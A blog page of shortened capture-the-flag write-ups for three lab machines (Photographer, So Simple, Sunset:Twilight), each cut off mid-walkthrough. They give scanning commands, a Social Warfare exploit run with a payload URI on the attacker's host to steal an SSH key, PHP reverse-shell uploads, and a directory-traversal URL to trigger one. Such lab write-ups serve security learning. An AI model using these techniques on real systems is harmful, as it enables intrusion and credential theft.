All about CTF writeups

Here's my solution for Photographer:1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. nmap -sC -sV -p- 192.168.1.107 We find 4 open ports. Enumeration Enumerating SMB shares, we find that we have access to share named as- sambashare. Lets get the smbshell. Download the file- mailsent.txt Reading the contents in mailsent.txt, gives us the hint as- User/Email: daisa@photographer.com Password: babygirl Browsing the web hosted on port 8000. Using dirb for scanning directories. dirb http://192.168.1.107:8000/ -f We find an /admin directory. We browse the /admin directory, if we observe the title and the logo it says- Koken, which is a CMS. Here we use those credentials which we have found in file- mailsent.txt Navigating to Settings Tab, displays the version- 0.22.24 We search for the exploit and we found it here. It seems that the author of the exploit and the box is- v1n1v131r4. Now we upload a php reverse shell file with double extension as- rshell.php.jpeg...

Here's my solution for So Simple:1. The machine can be downloaded from here. Nmap Scanning for all TCP ports. nmap -sC -sV -p- 192.168.1.104 We find 2 ports open. Directory Scan Browsing the web, and checking the source did not reveal any hint. Using dirb to scan for directories. dirb http://192.168.1.104 We get a /wordpress directory. Using wpscan to enumerate all plugins. wpscan --url http://192.168.1.104/wordpress -e ap We find an exploit for the plugin- social warfare, lets get this 46794.py To run the exploit, we create a file named as- exploit.txt, which contains the payload, and we host it on local machine. We run the exploit. python 46794.py -t http://192.168.1.104/wordpress/ --payload-uri=http://192.168.1.108:8080/exploit.txt By reading the contents, we find 2 users- max and steven. Now lets change the payload in exploit.txt file, to get the private ssh key of the user- max. Again we run the exploit. We copy the ssh key to a file named as- key. Getting Access Before access...

Here's my solution for Sunset:Twilight The Machine can be downloaded from here. Nmap Scanning for all TCP Ports. nmap -sC -sV -p- 192.168.1.107 We find 9 open ports. Enumeration Browsing the web, navigating to Change language URL, we find that it is vulnerable to Directory Transversal. Scanning directories using gobuster, gobuster dir -u http://192.168.1.107 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt We find an interesting directory /gallery, which allows to upload jpeg images. While emumerating SMB shares, we find that we have access to share named as- WRKSHARE Lets get the smbshell. Now, we place a php reverse shell file named as shell.php, in var\www\html directory. To execute the shell.php, we browse http://192.168.1.107/shell.php (We can also browse through the url which is vulnerable to Directory Transversal- http://192.168.1.107/lang.php?lang=../../../var/www/html/shell.php) And on the other hand we start the netcat listener. And we get reverse shell. Pr...